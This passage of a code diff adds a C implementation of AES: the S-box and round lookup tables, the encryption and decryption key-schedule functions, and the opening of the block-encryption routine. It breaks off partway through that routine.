+    U64(0x0ef3f3fd0ef3f3fd), U64(0x6dd2d2bf6dd2d2bf),
+    U64(0x4ccdcd814ccdcd81), U64(0x140c0c18140c0c18),
+    U64(0x3513132635131326), U64(0x2fececc32fececc3),
+    U64(0xe15f5fbee15f5fbe), U64(0xa2979735a2979735),
+    U64(0xcc444488cc444488), U64(0x3917172e3917172e),
+    U64(0x57c4c49357c4c493), U64(0xf2a7a755f2a7a755),
+    U64(0x827e7efc827e7efc), U64(0x473d3d7a473d3d7a),
+    U64(0xac6464c8ac6464c8), U64(0xe75d5dbae75d5dba),
+    U64(0x2b1919322b191932), U64(0x957373e6957373e6),
+    U64(0xa06060c0a06060c0), U64(0x9881811998818119),
+    U64(0xd14f4f9ed14f4f9e), U64(0x7fdcdca37fdcdca3),
+    U64(0x6622224466222244), U64(0x7e2a2a547e2a2a54),
+    U64(0xab90903bab90903b), U64(0x8388880b8388880b),
+    U64(0xca46468cca46468c), U64(0x29eeeec729eeeec7),
+    U64(0xd3b8b86bd3b8b86b), U64(0x3c1414283c141428),
+    U64(0x79dedea779dedea7), U64(0xe25e5ebce25e5ebc),
+    U64(0x1d0b0b161d0b0b16), U64(0x76dbdbad76dbdbad),
+    U64(0x3be0e0db3be0e0db), U64(0x5632326456323264),
+    U64(0x4e3a3a744e3a3a74), U64(0x1e0a0a141e0a0a14),
+    U64(0xdb494992db494992), U64(0x0a06060c0a06060c),
+    U64(0x6c2424486c242448), U64(0xe45c5cb8e45c5cb8),
+    U64(0x5dc2c29f5dc2c29f), U64(0x6ed3d3bd6ed3d3bd),
+    U64(0xefacac43efacac43), U64(0xa66262c4a66262c4),
+    U64(0xa8919139a8919139), U64(0xa4959531a4959531),
+    U64(0x37e4e4d337e4e4d3), U64(0x8b7979f28b7979f2),
+    U64(0x32e7e7d532e7e7d5), U64(0x43c8c88b43c8c88b),
+    U64(0x5937376e5937376e), U64(0xb76d6ddab76d6dda),
+    U64(0x8c8d8d018c8d8d01), U64(0x64d5d5b164d5d5b1),
+    U64(0xd24e4e9cd24e4e9c), U64(0xe0a9a949e0a9a949),
+    U64(0xb46c6cd8b46c6cd8), U64(0xfa5656acfa5656ac),
+    U64(0x07f4f4f307f4f4f3), U64(0x25eaeacf25eaeacf),
+    U64(0xaf6565caaf6565ca), U64(0x8e7a7af48e7a7af4),
+    U64(0xe9aeae47e9aeae47), U64(0x1808081018080810),
+    U64(0xd5baba6fd5baba6f), U64(0x887878f0887878f0),
+    U64(0x6f25254a6f25254a), U64(0x722e2e5c722e2e5c),
+    U64(0x241c1c38241c1c38), U64(0xf1a6a657f1a6a657),
+    U64(0xc7b4b473c7b4b473), U64(0x51c6c69751c6c697),
+    U64(0x23e8e8cb23e8e8cb), U64(0x7cdddda17cdddda1),
+    U64(0x9c7474e89c7474e8), U64(0x211f1f3e211f1f3e),
+    U64(0xdd4b4b96dd4b4b96), U64(0xdcbdbd61dcbdbd61),
+    U64(0x868b8b0d868b8b0d), U64(0x858a8a0f858a8a0f),
+    U64(0x907070e0907070e0), U64(0x423e3e7c423e3e7c),
+    U64(0xc4b5b571c4b5b571), U64(0xaa6666ccaa6666cc),
+    U64(0xd8484890d8484890), U64(0x0503030605030306),
+    U64(0x01f6f6f701f6f6f7), U64(0x120e0e1c120e0e1c),
+    U64(0xa36161c2a36161c2), U64(0x5f35356a5f35356a),
+    U64(0xf95757aef95757ae), U64(0xd0b9b969d0b9b969),
+    U64(0x9186861791868617), U64(0x58c1c19958c1c199),
+    U64(0x271d1d3a271d1d3a), U64(0xb99e9e27b99e9e27),
+    U64(0x38e1e1d938e1e1d9), U64(0x13f8f8eb13f8f8eb),
+    U64(0xb398982bb398982b), U64(0x3311112233111122),
+    U64(0xbb6969d2bb6969d2), U64(0x70d9d9a970d9d9a9),
+    U64(0x898e8e07898e8e07), U64(0xa7949433a7949433),
+    U64(0xb69b9b2db69b9b2d), U64(0x221e1e3c221e1e3c),
+    U64(0x9287871592878715), U64(0x20e9e9c920e9e9c9),
+    U64(0x49cece8749cece87), U64(0xff5555aaff5555aa),
+    U64(0x7828285078282850), U64(0x7adfdfa57adfdfa5),
+    U64(0x8f8c8c038f8c8c03), U64(0xf8a1a159f8a1a159),
+    U64(0x8089890980898909), U64(0x170d0d1a170d0d1a),
+    U64(0xdabfbf65dabfbf65), U64(0x31e6e6d731e6e6d7),
+    U64(0xc6424284c6424284), U64(0xb86868d0b86868d0),
+    U64(0xc3414182c3414182), U64(0xb0999929b0999929),
+    U64(0x772d2d5a772d2d5a), U64(0x110f0f1e110f0f1e),
+    U64(0xcbb0b07bcbb0b07b), U64(0xfc5454a8fc5454a8),
+    U64(0xd6bbbb6dd6bbbb6d), U64(0x3a16162c3a16162c)
+};
+
+static const u8 Te4[256] = {
+    0x63U, 0x7cU, 0x77U, 0x7bU, 0xf2U, 0x6bU, 0x6fU, 0xc5U,
+    0x30U, 0x01U, 0x67U, 0x2bU, 0xfeU, 0xd7U, 0xabU, 0x76U,
+    0xcaU, 0x82U, 0xc9U, 0x7dU, 0xfaU, 0x59U, 0x47U, 0xf0U,
+    0xadU, 0xd4U, 0xa2U, 0xafU, 0x9cU, 0xa4U, 0x72U, 0xc0U,
+    0xb7U, 0xfdU, 0x93U, 0x26U, 0x36U, 0x3fU, 0xf7U, 0xccU,
+    0x34U, 0xa5U, 0xe5U, 0xf1U, 0x71U, 0xd8U, 0x31U, 0x15U,
+    0x04U, 0xc7U, 0x23U, 0xc3U, 0x18U, 0x96U, 0x05U, 0x9aU,
+    0x07U, 0x12U, 0x80U, 0xe2U, 0xebU, 0x27U, 0xb2U, 0x75U,
+    0x09U, 0x83U, 0x2cU, 0x1aU, 0x1bU, 0x6eU, 0x5aU, 0xa0U,
+    0x52U, 0x3bU, 0xd6U, 0xb3U, 0x29U, 0xe3U, 0x2fU, 0x84U,
+    0x53U, 0xd1U, 0x00U, 0xedU, 0x20U, 0xfcU, 0xb1U, 0x5bU,
+    0x6aU, 0xcbU, 0xbeU, 0x39U, 0x4aU, 0x4cU, 0x58U, 0xcfU,
+    0xd0U, 0xefU, 0xaaU, 0xfbU, 0x43U, 0x4dU, 0x33U, 0x85U,
+    0x45U, 0xf9U, 0x02U, 0x7fU, 0x50U, 0x3cU, 0x9fU, 0xa8U,
+    0x51U, 0xa3U, 0x40U, 0x8fU, 0x92U, 0x9dU, 0x38U, 0xf5U,
+    0xbcU, 0xb6U, 0xdaU, 0x21U, 0x10U, 0xffU, 0xf3U, 0xd2U,
+    0xcdU, 0x0cU, 0x13U, 0xecU, 0x5fU, 0x97U, 0x44U, 0x17U,
+    0xc4U, 0xa7U, 0x7eU, 0x3dU, 0x64U, 0x5dU, 0x19U, 0x73U,
+    0x60U, 0x81U, 0x4fU, 0xdcU, 0x22U, 0x2aU, 0x90U, 0x88U,
+    0x46U, 0xeeU, 0xb8U, 0x14U, 0xdeU, 0x5eU, 0x0bU, 0xdbU,
+    0xe0U, 0x32U, 0x3aU, 0x0aU, 0x49U, 0x06U, 0x24U, 0x5cU,
+    0xc2U, 0xd3U, 0xacU, 0x62U, 0x91U, 0x95U, 0xe4U, 0x79U,
+    0xe7U, 0xc8U, 0x37U, 0x6dU, 0x8dU, 0xd5U, 0x4eU, 0xa9U,
+    0x6cU, 0x56U, 0xf4U, 0xeaU, 0x65U, 0x7aU, 0xaeU, 0x08U,
+    0xbaU, 0x78U, 0x25U, 0x2eU, 0x1cU, 0xa6U, 0xb4U, 0xc6U,
+    0xe8U, 0xddU, 0x74U, 0x1fU, 0x4bU, 0xbdU, 0x8bU, 0x8aU,
+    0x70U, 0x3eU, 0xb5U, 0x66U, 0x48U, 0x03U, 0xf6U, 0x0eU,
+    0x61U, 0x35U, 0x57U, 0xb9U, 0x86U, 0xc1U, 0x1dU, 0x9eU,
+    0xe1U, 0xf8U, 0x98U, 0x11U, 0x69U, 0xd9U, 0x8eU, 0x94U,
+    0x9bU, 0x1eU, 0x87U, 0xe9U, 0xceU, 0x55U, 0x28U, 0xdfU,
+    0x8cU, 0xa1U, 0x89U, 0x0dU, 0xbfU, 0xe6U, 0x42U, 0x68U,
+    0x41U, 0x99U, 0x2dU, 0x0fU, 0xb0U, 0x54U, 0xbbU, 0x16U
+};
+
+static const u64 Td[256] = {
+    U64(0x50a7f45150a7f451), U64(0x5365417e5365417e),
+    U64(0xc3a4171ac3a4171a), U64(0x965e273a965e273a),
+    U64(0xcb6bab3bcb6bab3b), U64(0xf1459d1ff1459d1f),
+    U64(0xab58faacab58faac), U64(0x9303e34b9303e34b),
+    U64(0x55fa302055fa3020), U64(0xf66d76adf66d76ad),
+    U64(0x9176cc889176cc88), U64(0x254c02f5254c02f5),
+    U64(0xfcd7e54ffcd7e54f), U64(0xd7cb2ac5d7cb2ac5),
+    U64(0x8044352680443526), U64(0x8fa362b58fa362b5),
+    U64(0x495ab1de495ab1de), U64(0x671bba25671bba25),
+    U64(0x980eea45980eea45), U64(0xe1c0fe5de1c0fe5d),
+    U64(0x02752fc302752fc3), U64(0x12f04c8112f04c81),
+    U64(0xa397468da397468d), U64(0xc6f9d36bc6f9d36b),
+    U64(0xe75f8f03e75f8f03), U64(0x959c9215959c9215),
+    U64(0xeb7a6dbfeb7a6dbf), U64(0xda595295da595295),
+    U64(0x2d83bed42d83bed4), U64(0xd3217458d3217458),
+    U64(0x2969e0492969e049), U64(0x44c8c98e44c8c98e),
+    U64(0x6a89c2756a89c275), U64(0x78798ef478798ef4),
+    U64(0x6b3e58996b3e5899), U64(0xdd71b927dd71b927),
+    U64(0xb64fe1beb64fe1be), U64(0x17ad88f017ad88f0),
+    U64(0x66ac20c966ac20c9), U64(0xb43ace7db43ace7d),
+    U64(0x184adf63184adf63), U64(0x82311ae582311ae5),
+    U64(0x6033519760335197), U64(0x457f5362457f5362),
+    U64(0xe07764b1e07764b1), U64(0x84ae6bbb84ae6bbb),
+    U64(0x1ca081fe1ca081fe), U64(0x942b08f9942b08f9),
+    U64(0x5868487058684870), U64(0x19fd458f19fd458f),
+    U64(0x876cde94876cde94), U64(0xb7f87b52b7f87b52),
+    U64(0x23d373ab23d373ab), U64(0xe2024b72e2024b72),
+    U64(0x578f1fe3578f1fe3), U64(0x2aab55662aab5566),
+    U64(0x0728ebb20728ebb2), U64(0x03c2b52f03c2b52f),
+    U64(0x9a7bc5869a7bc586), U64(0xa50837d3a50837d3),
+    U64(0xf2872830f2872830), U64(0xb2a5bf23b2a5bf23),
+    U64(0xba6a0302ba6a0302), U64(0x5c8216ed5c8216ed),
+    U64(0x2b1ccf8a2b1ccf8a), U64(0x92b479a792b479a7),
+    U64(0xf0f207f3f0f207f3), U64(0xa1e2694ea1e2694e),
+    U64(0xcdf4da65cdf4da65), U64(0xd5be0506d5be0506),
+    U64(0x1f6234d11f6234d1), U64(0x8afea6c48afea6c4),
+    U64(0x9d532e349d532e34), U64(0xa055f3a2a055f3a2),
+    U64(0x32e18a0532e18a05), U64(0x75ebf6a475ebf6a4),
+    U64(0x39ec830b39ec830b), U64(0xaaef6040aaef6040),
+    U64(0x069f715e069f715e), U64(0x51106ebd51106ebd),
+    U64(0xf98a213ef98a213e), U64(0x3d06dd963d06dd96),
+    U64(0xae053eddae053edd), U64(0x46bde64d46bde64d),
+    U64(0xb58d5491b58d5491), U64(0x055dc471055dc471),
+    U64(0x6fd406046fd40604), U64(0xff155060ff155060),
+    U64(0x24fb981924fb9819), U64(0x97e9bdd697e9bdd6),
+    U64(0xcc434089cc434089), U64(0x779ed967779ed967),
+    U64(0xbd42e8b0bd42e8b0), U64(0x888b8907888b8907),
+    U64(0x385b19e7385b19e7), U64(0xdbeec879dbeec879),
+    U64(0x470a7ca1470a7ca1), U64(0xe90f427ce90f427c),
+    U64(0xc91e84f8c91e84f8), U64(0x0000000000000000),
+    U64(0x8386800983868009), U64(0x48ed2b3248ed2b32),
+    U64(0xac70111eac70111e), U64(0x4e725a6c4e725a6c),
+    U64(0xfbff0efdfbff0efd), U64(0x5638850f5638850f),
+    U64(0x1ed5ae3d1ed5ae3d), U64(0x27392d3627392d36),
+    U64(0x64d90f0a64d90f0a), U64(0x21a65c6821a65c68),
+    U64(0xd1545b9bd1545b9b), U64(0x3a2e36243a2e3624),
+    U64(0xb1670a0cb1670a0c), U64(0x0fe757930fe75793),
+    U64(0xd296eeb4d296eeb4), U64(0x9e919b1b9e919b1b),
+    U64(0x4fc5c0804fc5c080), U64(0xa220dc61a220dc61),
+    U64(0x694b775a694b775a), U64(0x161a121c161a121c),
+    U64(0x0aba93e20aba93e2), U64(0xe52aa0c0e52aa0c0),
+    U64(0x43e0223c43e0223c), U64(0x1d171b121d171b12),
+    U64(0x0b0d090e0b0d090e), U64(0xadc78bf2adc78bf2),
+    U64(0xb9a8b62db9a8b62d), U64(0xc8a91e14c8a91e14),
+    U64(0x8519f1578519f157), U64(0x4c0775af4c0775af),
+    U64(0xbbdd99eebbdd99ee), U64(0xfd607fa3fd607fa3),
+    U64(0x9f2601f79f2601f7), U64(0xbcf5725cbcf5725c),
+    U64(0xc53b6644c53b6644), U64(0x347efb5b347efb5b),
+    U64(0x7629438b7629438b), U64(0xdcc623cbdcc623cb),
+    U64(0x68fcedb668fcedb6), U64(0x63f1e4b863f1e4b8),
+    U64(0xcadc31d7cadc31d7), U64(0x1085634210856342),
+    U64(0x4022971340229713), U64(0x2011c6842011c684),
+    U64(0x7d244a857d244a85), U64(0xf83dbbd2f83dbbd2),
+    U64(0x1132f9ae1132f9ae), U64(0x6da129c76da129c7),
+    U64(0x4b2f9e1d4b2f9e1d), U64(0xf330b2dcf330b2dc),
+    U64(0xec52860dec52860d), U64(0xd0e3c177d0e3c177),
+    U64(0x6c16b32b6c16b32b), U64(0x99b970a999b970a9),
+    U64(0xfa489411fa489411), U64(0x2264e9472264e947),
+    U64(0xc48cfca8c48cfca8), U64(0x1a3ff0a01a3ff0a0),
+    U64(0xd82c7d56d82c7d56), U64(0xef903322ef903322),
+    U64(0xc74e4987c74e4987), U64(0xc1d138d9c1d138d9),
+    U64(0xfea2ca8cfea2ca8c), U64(0x360bd498360bd498),
+    U64(0xcf81f5a6cf81f5a6), U64(0x28de7aa528de7aa5),
+    U64(0x268eb7da268eb7da), U64(0xa4bfad3fa4bfad3f),
+    U64(0xe49d3a2ce49d3a2c), U64(0x0d9278500d927850),
+    U64(0x9bcc5f6a9bcc5f6a), U64(0x62467e5462467e54),
+    U64(0xc2138df6c2138df6), U64(0xe8b8d890e8b8d890),
+    U64(0x5ef7392e5ef7392e), U64(0xf5afc382f5afc382),
+    U64(0xbe805d9fbe805d9f), U64(0x7c93d0697c93d069),
+    U64(0xa92dd56fa92dd56f), U64(0xb31225cfb31225cf),
+    U64(0x3b99acc83b99acc8), U64(0xa77d1810a77d1810),
+    U64(0x6e639ce86e639ce8), U64(0x7bbb3bdb7bbb3bdb),
+    U64(0x097826cd097826cd), U64(0xf418596ef418596e),
+    U64(0x01b79aec01b79aec), U64(0xa89a4f83a89a4f83),
+    U64(0x656e95e6656e95e6), U64(0x7ee6ffaa7ee6ffaa),
+    U64(0x08cfbc2108cfbc21), U64(0xe6e815efe6e815ef),
+    U64(0xd99be7bad99be7ba), U64(0xce366f4ace366f4a),
+    U64(0xd4099fead4099fea), U64(0xd67cb029d67cb029),
+    U64(0xafb2a431afb2a431), U64(0x31233f2a31233f2a),
+    U64(0x3094a5c63094a5c6), U64(0xc066a235c066a235),
+    U64(0x37bc4e7437bc4e74), U64(0xa6ca82fca6ca82fc),
+    U64(0xb0d090e0b0d090e0), U64(0x15d8a73315d8a733),
+    U64(0x4a9804f14a9804f1), U64(0xf7daec41f7daec41),
+    U64(0x0e50cd7f0e50cd7f), U64(0x2ff691172ff69117),
+    U64(0x8dd64d768dd64d76), U64(0x4db0ef434db0ef43),
+    U64(0x544daacc544daacc), U64(0xdf0496e4df0496e4),
+    U64(0xe3b5d19ee3b5d19e), U64(0x1b886a4c1b886a4c),
+    U64(0xb81f2cc1b81f2cc1), U64(0x7f5165467f516546),
+    U64(0x04ea5e9d04ea5e9d), U64(0x5d358c015d358c01),
+    U64(0x737487fa737487fa), U64(0x2e410bfb2e410bfb),
+    U64(0x5a1d67b35a1d67b3), U64(0x52d2db9252d2db92),
+    U64(0x335610e9335610e9), U64(0x1347d66d1347d66d),
+    U64(0x8c61d79a8c61d79a), U64(0x7a0ca1377a0ca137),
+    U64(0x8e14f8598e14f859), U64(0x893c13eb893c13eb),
+    U64(0xee27a9ceee27a9ce), U64(0x35c961b735c961b7),
+    U64(0xede51ce1ede51ce1), U64(0x3cb1477a3cb1477a),
+    U64(0x59dfd29c59dfd29c), U64(0x3f73f2553f73f255),
+    U64(0x79ce141879ce1418), U64(0xbf37c773bf37c773),
+    U64(0xeacdf753eacdf753), U64(0x5baafd5f5baafd5f),
+    U64(0x146f3ddf146f3ddf), U64(0x86db447886db4478),
+    U64(0x81f3afca81f3afca), U64(0x3ec468b93ec468b9),
+    U64(0x2c3424382c342438), U64(0x5f40a3c25f40a3c2),
+    U64(0x72c31d1672c31d16), U64(0x0c25e2bc0c25e2bc),
+    U64(0x8b493c288b493c28), U64(0x41950dff41950dff),
+    U64(0x7101a8397101a839), U64(0xdeb30c08deb30c08),
+    U64(0x9ce4b4d89ce4b4d8), U64(0x90c1566490c15664),
+    U64(0x6184cb7b6184cb7b), U64(0x70b632d570b632d5),
+    U64(0x745c6c48745c6c48), U64(0x4257b8d04257b8d0)
+};
+static const u8 Td4[256] = {
+    0x52U, 0x09U, 0x6aU, 0xd5U, 0x30U, 0x36U, 0xa5U, 0x38U,
+    0xbfU, 0x40U, 0xa3U, 0x9eU, 0x81U, 0xf3U, 0xd7U, 0xfbU,
+    0x7cU, 0xe3U, 0x39U, 0x82U, 0x9bU, 0x2fU, 0xffU, 0x87U,
+    0x34U, 0x8eU, 0x43U, 0x44U, 0xc4U, 0xdeU, 0xe9U, 0xcbU,
+    0x54U, 0x7bU, 0x94U, 0x32U, 0xa6U, 0xc2U, 0x23U, 0x3dU,
+    0xeeU, 0x4cU, 0x95U, 0x0bU, 0x42U, 0xfaU, 0xc3U, 0x4eU,
+    0x08U, 0x2eU, 0xa1U, 0x66U, 0x28U, 0xd9U, 0x24U, 0xb2U,
+    0x76U, 0x5bU, 0xa2U, 0x49U, 0x6dU, 0x8bU, 0xd1U, 0x25U,
+    0x72U, 0xf8U, 0xf6U, 0x64U, 0x86U, 0x68U, 0x98U, 0x16U,
+    0xd4U, 0xa4U, 0x5cU, 0xccU, 0x5dU, 0x65U, 0xb6U, 0x92U,
+    0x6cU, 0x70U, 0x48U, 0x50U, 0xfdU, 0xedU, 0xb9U, 0xdaU,
+    0x5eU, 0x15U, 0x46U, 0x57U, 0xa7U, 0x8dU, 0x9dU, 0x84U,
+    0x90U, 0xd8U, 0xabU, 0x00U, 0x8cU, 0xbcU, 0xd3U, 0x0aU,
+    0xf7U, 0xe4U, 0x58U, 0x05U, 0xb8U, 0xb3U, 0x45U, 0x06U,
+    0xd0U, 0x2cU, 0x1eU, 0x8fU, 0xcaU, 0x3fU, 0x0fU, 0x02U,
+    0xc1U, 0xafU, 0xbdU, 0x03U, 0x01U, 0x13U, 0x8aU, 0x6bU,
+    0x3aU, 0x91U, 0x11U, 0x41U, 0x4fU, 0x67U, 0xdcU, 0xeaU,
+    0x97U, 0xf2U, 0xcfU, 0xceU, 0xf0U, 0xb4U, 0xe6U, 0x73U,
+    0x96U, 0xacU, 0x74U, 0x22U, 0xe7U, 0xadU, 0x35U, 0x85U,
+    0xe2U, 0xf9U, 0x37U, 0xe8U, 0x1cU, 0x75U, 0xdfU, 0x6eU,
+    0x47U, 0xf1U, 0x1aU, 0x71U, 0x1dU, 0x29U, 0xc5U, 0x89U,
+    0x6fU, 0xb7U, 0x62U, 0x0eU, 0xaaU, 0x18U, 0xbeU, 0x1bU,
+    0xfcU, 0x56U, 0x3eU, 0x4bU, 0xc6U, 0xd2U, 0x79U, 0x20U,
+    0x9aU, 0xdbU, 0xc0U, 0xfeU, 0x78U, 0xcdU, 0x5aU, 0xf4U,
+    0x1fU, 0xddU, 0xa8U, 0x33U, 0x88U, 0x07U, 0xc7U, 0x31U,
+    0xb1U, 0x12U, 0x10U, 0x59U, 0x27U, 0x80U, 0xecU, 0x5fU,
+    0x60U, 0x51U, 0x7fU, 0xa9U, 0x19U, 0xb5U, 0x4aU, 0x0dU,
+    0x2dU, 0xe5U, 0x7aU, 0x9fU, 0x93U, 0xc9U, 0x9cU, 0xefU,
+    0xa0U, 0xe0U, 0x3bU, 0x4dU, 0xaeU, 0x2aU, 0xf5U, 0xb0U,
+    0xc8U, 0xebU, 0xbbU, 0x3cU, 0x83U, 0x53U, 0x99U, 0x61U,
+    0x17U, 0x2bU, 0x04U, 0x7eU, 0xbaU, 0x77U, 0xd6U, 0x26U,
+    0xe1U, 0x69U, 0x14U, 0x63U, 0x55U, 0x21U, 0x0cU, 0x7dU
+};
+
+static const u32 rcon[] = {
+    0x00000001U, 0x00000002U, 0x00000004U, 0x00000008U,
+    0x00000010U, 0x00000020U, 0x00000040U, 0x00000080U,
+    0x0000001bU, 0x00000036U, /* for 128-bit blocks, Rijndael never uses more than 10 rcon values */
+};
+
+/**
+ * Expand the cipher key into the encryption key schedule.
+ */
+int AES_set_encrypt_key(const unsigned char *userKey, const int bits,
+                        AES_KEY *key)
+{
+
+    u32 *rk;
+    int i = 0;
+    u32 temp;
+
+    if (!userKey || !key)
+        return -1;
+    if (bits != 128 && bits != 192 && bits != 256)
+        return -2;
+
+    rk = key->rd_key;
+
+    if (bits==128)
+        key->rounds = 10;
+    else if (bits==192)
+        key->rounds = 12;
+    else
+        key->rounds = 14;
+
+    rk[0] = GETU32(userKey     );
+    rk[1] = GETU32(userKey +  4);
+    rk[2] = GETU32(userKey +  8);
+    rk[3] = GETU32(userKey + 12);
+    if (bits == 128) {
+        while (1) {
+            temp  = rk[3];
+            rk[4] = rk[0] ^
+                (Te4[(temp >>  8) & 0xff]      ) ^
+                (Te4[(temp >> 16) & 0xff] <<  8) ^
+                (Te4[(temp >> 24)       ] << 16) ^
+                (Te4[(temp      ) & 0xff] << 24) ^
+                rcon[i];
+            rk[5] = rk[1] ^ rk[4];
+            rk[6] = rk[2] ^ rk[5];
+            rk[7] = rk[3] ^ rk[6];
+            if (++i == 10) {
+                return 0;
+            }
+            rk += 4;
+        }
+    }
+    rk[4] = GETU32(userKey + 16);
+    rk[5] = GETU32(userKey + 20);
+    if (bits == 192) {
+        while (1) {
+            temp = rk[ 5];
+            rk[ 6] = rk[ 0] ^
+                (Te4[(temp >>  8) & 0xff]      ) ^
+                (Te4[(temp >> 16) & 0xff] <<  8) ^
+                (Te4[(temp >> 24)       ] << 16) ^
+                (Te4[(temp      ) & 0xff] << 24) ^
+                rcon[i];
+            rk[ 7] = rk[ 1] ^ rk[ 6];
+            rk[ 8] = rk[ 2] ^ rk[ 7];
+            rk[ 9] = rk[ 3] ^ rk[ 8];
+            if (++i == 8) {
+                return 0;
+            }
+            rk[10] = rk[ 4] ^ rk[ 9];
+            rk[11] = rk[ 5] ^ rk[10];
+            rk += 6;
+        }
+    }
+    rk[6] = GETU32(userKey + 24);
+    rk[7] = GETU32(userKey + 28);
+    if (bits == 256) {
+        while (1) {
+            temp = rk[ 7];
+            rk[ 8] = rk[ 0] ^
+                (Te4[(temp >>  8) & 0xff]      ) ^
+                (Te4[(temp >> 16) & 0xff] <<  8) ^
+                (Te4[(temp >> 24)       ] << 16) ^
+                (Te4[(temp      ) & 0xff] << 24) ^
+                rcon[i];
+            rk[ 9] = rk[ 1] ^ rk[ 8];
+            rk[10] = rk[ 2] ^ rk[ 9];
+            rk[11] = rk[ 3] ^ rk[10];
+            if (++i == 7) {
+                return 0;
+            }
+            temp = rk[11];
+            rk[12] = rk[ 4] ^
+                (Te4[(temp      ) & 0xff]      ) ^
+                (Te4[(temp >>  8) & 0xff] <<  8) ^
+                (Te4[(temp >> 16) & 0xff] << 16) ^
+                (Te4[(temp >> 24)       ] << 24);
+            rk[13] = rk[ 5] ^ rk[12];
+            rk[14] = rk[ 6] ^ rk[13];
+            rk[15] = rk[ 7] ^ rk[14];
+
+            rk += 8;
+            }
+    }
+    return 0;
+}
+
+/**
+ * Expand the cipher key into the decryption key schedule.
+ */
+int AES_set_decrypt_key(const unsigned char *userKey, const int bits,
+                        AES_KEY *key)
+{
+
+    u32 *rk;
+    int i, j, status;
+    u32 temp;
+
+    /* first, start with an encryption schedule */
+    status = AES_set_encrypt_key(userKey, bits, key);
+    if (status < 0)
+        return status;
+
+    rk = key->rd_key;
+
+    /* invert the order of the round keys: */
+    for (i = 0, j = 4*(key->rounds); i < j; i += 4, j -= 4) {
+        temp = rk[i    ]; rk[i    ] = rk[j    ]; rk[j    ] = temp;
+        temp = rk[i + 1]; rk[i + 1] = rk[j + 1]; rk[j + 1] = temp;
+        temp = rk[i + 2]; rk[i + 2] = rk[j + 2]; rk[j + 2] = temp;
+        temp = rk[i + 3]; rk[i + 3] = rk[j + 3]; rk[j + 3] = temp;
+    }
+    /* apply the inverse MixColumn transform to all round keys but the first and the last: */
+    for (i = 1; i < (key->rounds); i++) {
+        rk += 4;
+#if 1
+        for (j = 0; j < 4; j++) {
+            u32 tp1, tp2, tp4, tp8, tp9, tpb, tpd, tpe, m;
+
+            tp1 = rk[j];
+            m = tp1 & 0x80808080;
+            tp2 = ((tp1 & 0x7f7f7f7f) << 1) ^
+                ((m - (m >> 7)) & 0x1b1b1b1b);
+            m = tp2 & 0x80808080;
+            tp4 = ((tp2 & 0x7f7f7f7f) << 1) ^
+                ((m - (m >> 7)) & 0x1b1b1b1b);
+            m = tp4 & 0x80808080;
+            tp8 = ((tp4 & 0x7f7f7f7f) << 1) ^
+                ((m - (m >> 7)) & 0x1b1b1b1b);
+            tp9 = tp8 ^ tp1;
+            tpb = tp9 ^ tp2;
+            tpd = tp9 ^ tp4;
+            tpe = tp8 ^ tp4 ^ tp2;
+#if defined(ROTATE)
+            rk[j] = tpe ^ ROTATE(tpd,16) ^
+                ROTATE(tp9,8) ^ ROTATE(tpb,24);
+#else
+            rk[j] = tpe ^ (tpd >> 16) ^ (tpd << 16) ^ 
+                (tp9 >> 24) ^ (tp9 << 8) ^
+                (tpb >> 8) ^ (tpb << 24);
+#endif
+        }
+#else
+        rk[0] =
+            Td0[Te2[(rk[0]      ) & 0xff] & 0xff] ^
+            Td1[Te2[(rk[0] >>  8) & 0xff] & 0xff] ^
+            Td2[Te2[(rk[0] >> 16) & 0xff] & 0xff] ^
+            Td3[Te2[(rk[0] >> 24)       ] & 0xff];
+        rk[1] =
+            Td0[Te2[(rk[1]      ) & 0xff] & 0xff] ^
+            Td1[Te2[(rk[1] >>  8) & 0xff] & 0xff] ^
+            Td2[Te2[(rk[1] >> 16) & 0xff] & 0xff] ^
+            Td3[Te2[(rk[1] >> 24)       ] & 0xff];
+        rk[2] =
+            Td0[Te2[(rk[2]      ) & 0xff] & 0xff] ^
+            Td1[Te2[(rk[2] >>  8) & 0xff] & 0xff] ^
+            Td2[Te2[(rk[2] >> 16) & 0xff] & 0xff] ^
+            Td3[Te2[(rk[2] >> 24)       ] & 0xff];
+        rk[3] =
+            Td0[Te2[(rk[3]      ) & 0xff] & 0xff] ^
+            Td1[Te2[(rk[3] >>  8) & 0xff] & 0xff] ^
+            Td2[Te2[(rk[3] >> 16) & 0xff] & 0xff] ^
+            Td3[Te2[(rk[3] >> 24)       ] & 0xff];
+#endif
+    }
+    return 0;
+}
+
+/*
+ * Encrypt a single block
+ * in and out can overlap
+ */
+void AES_encrypt(const unsigned char *in, unsigned char *out,
+                 const AES_KEY *key)
+{
+
+    const u32 *rk;
+    u32 s0, s1, s2, s3, t[4];
+    int r;
+
+    assert(in && out && key);
+    rk = key->rd_key;
+
+    /*
+     * map byte array block to cipher state
+     * and add initial round key:
+     */
+    s0 = GETU32(in     ) ^ rk[0];
+    s1 = GETU32(in +  4) ^ rk[1];
+    s2 = GETU32(in +  8) ^ rk[2];
+    s3 = GETU32(in + 12) ^ rk[3];
+
+#if defined(AES_COMPACT_IN_OUTER_ROUNDS)
+    prefetch256(Te4);
+
+    t[0] =  Te4[(s0      ) & 0xff]       ^
+        Te4[(s1 >>  8) & 0xff] <<  8 ^
+        Te4[(s2 >> 16) & 0xff] << 16 ^
+        Te4[(s3 >> 24)       ] << 24;
+    t[1] =  Te4[(s1      ) & 0xff]       ^
+        Te4[(s2 >>  8) & 0xff] <<  8 ^
+        Te4[(s3 >> 16) & 0xff] << 16 ^
+        Te4[(s0 >> 24)       ] << 24;
+    t[2] =  Te4[(s2      ) & 0xff]       ^
+        Te4[(s3 >>  8) & 0xff] <<  8 ^
+        Te4[(s0 >> 16) & 0xff] << 16 ^
+        Te4[(s1 >> 24)       ] << 24;
+    t[3] =  Te4[(s3      ) & 0xff]       ^
+        Te4[(s0 >>  8) & 0xff] <<  8 ^
+        Te4[(s1 >> 16) & 0xff] << 16 ^
+        Te4[(s2 >> 24)       ] << 24;
+
+    /* now do the linear transform using words */
+    {   int i;
+        u32 r0, r1, r2;
+
+        for (i = 0; i < 4; i++) {
+            r0 = t[i];
+            r1 = r0 & 0x80808080;
+            r2 = ((r0 & 0x7f7f7f7f) << 1) ^
+                ((r1 - (r1 >> 7)) & 0x1b1b1b1b);
+#if defined(ROTATE)
+            t[i] = r2 ^ ROTATE(r2,24) ^ ROTATE(r0,24) ^
+                ROTATE(r0,16) ^ ROTATE(r0,8);
+#else
+            t[i] = r2 ^ ((r2 ^ r0) << 24) ^ ((r2 ^ r0) >> 8) ^
+                (r0 << 16) ^ (r0 >> 16) ^
+                (r0 << 8) ^ (r0 >> 24);
+#endif
